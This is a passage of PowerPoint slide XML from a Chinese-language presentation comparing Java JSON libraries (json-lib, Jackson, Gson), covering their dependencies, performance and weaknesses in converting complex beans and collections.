                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>那样需要有严格的闭合标签，这就让有效数据量与总数据包比大大提升，从而减少同等数据流量的情况下，网络的传输压力。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4188461104"/>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0" y="5845310"/>
            <a:ext cx="12890090" cy="1944041"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="48220" tIns="48220" rIns="48220" bIns="48220" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="1285875">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr sz="7600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei"/>
                <a:ea typeface="Microsoft YaHei"/>
                <a:cs typeface="Microsoft YaHei"/>
                <a:sym typeface="Microsoft YaHei"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="8000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>二、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="8000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JSON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="8000" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>技术的简介和优劣</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="8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04462021"/>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48380"/>
            <a:ext cx="9499666" cy="11416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zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>各个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JSON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>技术的简介和优劣</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1C3267"/>
              </a:solidFill>
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1030682" y="2210574"/>
            <a:ext cx="22360260" cy="4339650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Json-lib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>（项目地址：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://json-lib.sourceforge.net/index.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>-lib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>最开始的也是应用最广泛的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">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解析工具，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>-lib </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>不好的地方确实是依赖于很多第三方包，包括</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>commons-beanutils.jar</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commons-collections-3.2.jar</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commons-lang-2.6.jar</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commons-logging-1.1.1.jar</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ezmorph-1.0.6.jar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>，对于复杂类型的转换，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>-lib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>对于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">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转换成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>bean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>还有缺陷，比如一个类里面会出现另一个类的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>map</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>集合，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>-lib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">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到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>bean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的转换就会出现问题。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>-lib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>在功能和性能上面都不能满足现在互联网化的需求。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="251737445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593429"/>
            <a:ext cx="9499666" cy="1251544"/>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zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>各个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JSON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>技术的简介和优劣</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1C3267"/>
              </a:solidFill>
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1030682" y="2210574"/>
            <a:ext cx="22360260" cy="3631763"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Jackson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>（项目地址：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/FasterXML/jackson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>）。相比</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>-lib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>框架，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Jackson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>所依赖的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>jar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>包较少，简单易用并且性能也要相对高些。而且</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Jackson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>社区相对比较活跃，更新速度也比较快。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Jackson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>对于复杂类型的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">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转换</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>bean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>会出现问题，一些集合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Map</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List</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的转换出现问题。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Jackson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>对于复杂类型的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>bean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>转换</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">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，转换的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">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格式不是标准的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">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格式。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="59160091"/>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593429"/>
            <a:ext cx="9499666" cy="1251544"/>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zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>各个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JSON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>技术的简介和优劣</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1C3267"/>
              </a:solidFill>
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1030682" y="2210574"/>
            <a:ext cx="22360260" cy="5755422"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Gson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>（项目地址：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/google/gson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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Gson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>是目前功能最全的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">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解析神器，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Gson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>当初是为因应</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Google</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>公司内部需求而由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
